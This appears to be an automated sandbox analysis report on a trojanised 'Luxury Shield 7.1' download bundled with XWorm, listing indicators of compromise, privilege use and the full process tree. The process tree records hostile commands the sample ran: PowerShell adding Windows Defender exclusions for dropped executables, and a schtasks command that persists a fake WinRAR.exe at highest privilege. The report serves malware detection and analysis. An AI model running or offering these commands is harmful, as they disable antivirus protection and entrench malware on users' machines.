Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6080 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3928 msedge.exe 3928 msedge.exe 1468 msedge.exe 1468 msedge.exe 3268 identity_helper.exe 3268 identity_helper.exe 1276 msedge.exe 1276 msedge.exe 5428 powershell.exe 5428 powershell.exe 5428 powershell.exe 5652 powershell.exe 5652 powershell.exe 5652 powershell.exe 5260 powershell.exe 5260 powershell.exe 5260 powershell.exe 5340 powershell.exe 5340 powershell.exe 5340 powershell.exe 5900 powershell.exe 5900 powershell.exe 5900 powershell.exe 372 powershell.exe 372 powershell.exe 372 powershell.exe 5740 msedge.exe 5740 msedge.exe 5740 msedge.exe 5740 msedge.exe 5388 powershell.exe 5388 powershell.exe 5388 powershell.exe 5768 powershell.exe 5768 powershell.exe 5768 powershell.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 2312 Luxury Shield 7.1.exe 444 XWorm.exe 4536 Luxury Shield 7.1.exe 5748 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 5428 powershell.exe Token: SeDebugPrivilege 5652 powershell.exe Token: SeDebugPrivilege 5928 WinRAR.exe Token: SeDebugPrivilege 5260 powershell.exe Token: SeDebugPrivilege 5340 powershell.exe Token: SeDebugPrivilege 5680 WinRAR.exe Token: SeDebugPrivilege 5900 powershell.exe Token: SeDebugPrivilege 372 powershell.exe Token: SeDebugPrivilege 3788 WinRAR.exe Token: SeDebugPrivilege 2192 WinRAR.exe Token: SeDebugPrivilege 5388 powershell.exe Token: SeDebugPrivilege 5768 powershell.exe Token: SeDebugPrivilege 5696 WinRAR.exe Token: SeDebugPrivilege 2312 Luxury Shield 7.1.exe Token: SeDebugPrivilege 4976 WinRAR.exe Token: SeDebugPrivilege 5852 WinRAR.exe Token: 33 228 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 228 AUDIODG.EXE Token: SeDebugPrivilege 5688 WinRAR.exe Token: SeDebugPrivilege 1704 WinRAR.exe Token: SeDebugPrivilege 2472 WinRAR.exe Token: SeDebugPrivilege 5388 powershell.exe Token: SeDebugPrivilege 3896 WinRAR.exe Token: SeDebugPrivilege 4656 WinRAR.exe Token: SeDebugPrivilege 1820 WinRAR.exe Token: SeDebugPrivilege 800 WinRAR.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 68 powershell.exe Token: SeDebugPrivilege 5272 WinRAR.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 5536 powershell.exe Token: SeDebugPrivilege 3468 WinRAR.exe Token: SeDebugPrivilege 5032 WinRAR.exe Token: SeDebugPrivilege 4536 Luxury Shield 7.1.exe Token: SeDebugPrivilege 5856 WinRAR.exe Token: SeDebugPrivilege 3500 WinRAR.exe Token: SeDebugPrivilege 2332 WinRAR.exe Token: SeDebugPrivilege 4856 WinRAR.exe Token: SeDebugPrivilege 1920 WinRAR.exe Token: SeDebugPrivilege 4740 WinRAR.exe Token: SeDebugPrivilege 1792 WinRAR.exe Token: SeDebugPrivilege 4648 WinRAR.exe Token: SeDebugPrivilege 1448 nexusv2.exe Token: SeDebugPrivilege 3396 WinRAR.exe Token: SeDebugPrivilege 2324 WinRAR.exe Token: SeDebugPrivilege 3204 WinRAR.exe Token: SeDebugPrivilege 5132 WinRAR.exe Token: SeDebugPrivilege 5908 WinRAR.exe Token: SeDebugPrivilege 5572 WinRAR.exe Token: SeDebugPrivilege 6040 WinRAR.exe Token: SeDebugPrivilege 5572 WinRAR.exe Token: SeDebugPrivilege 2656 WinRAR.exe Token: SeDebugPrivilege 3468 WinRAR.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 2312 Luxury Shield 7.1.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 444 XWorm.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 444 XWorm.exe -
Suspicious use of SetWindowsHookEx 44 IoCs
pid Process 5628 Luxury Shield 7.1.exe 4144 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 5608 Luxury Shield 7.1.exe 1280 XWorm V5.3.exe 444 XWorm.exe 444 XWorm.exe 444 XWorm.exe 444 XWorm.exe 444 XWorm.exe 444 XWorm.exe 4776 vbc.exe 2312 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 5068 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 5748 msedge.exe 5748 msedge.exe 5748 msedge.exe 5748 msedge.exe 5748 msedge.exe 4536 Luxury Shield 7.1.exe 3228 msedge.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 988 msedge.exe 988 msedge.exe 988 msedge.exe 988 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 2892 1468 msedge.exe 83 PID 1468 wrote to memory of 2892 1468 msedge.exe 83 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 4272 1468 msedge.exe 84 PID 1468 wrote to memory of 3928 1468 msedge.exe 85 PID 1468 wrote to memory of 3928 1468 msedge.exe 85 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 PID 1468 wrote to memory of 3060 1468 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/folder/o7onBAqb#lPnM6du1_ZsHQgf5SIaC4Q1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd3ab646f8,0x7ffd3ab64708,0x7ffd3ab647182⤵PID:2892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:22⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:82⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:82⤵PID:2300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:12⤵PID:3896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵PID:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 /prefetch:82⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:12⤵PID:4968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:12⤵PID:4008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5324 /prefetch:82⤵PID:3568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:2136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:12⤵PID:5420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1856 /prefetch:12⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:82⤵PID:5968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 /prefetch:82⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4048 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6692 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:988
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4452
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1696
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2fc 0x51c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:228
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4552
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Pass to use.txt1⤵PID:5204
-
C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"1⤵PID:5316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5928 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WinRAR" /tr "C:\Users\Public\WinRAR.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:6080
-
-
-
C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"1⤵PID:5132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5260
-
-
C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5340
-
-
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"1⤵PID:5804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5900
-
-
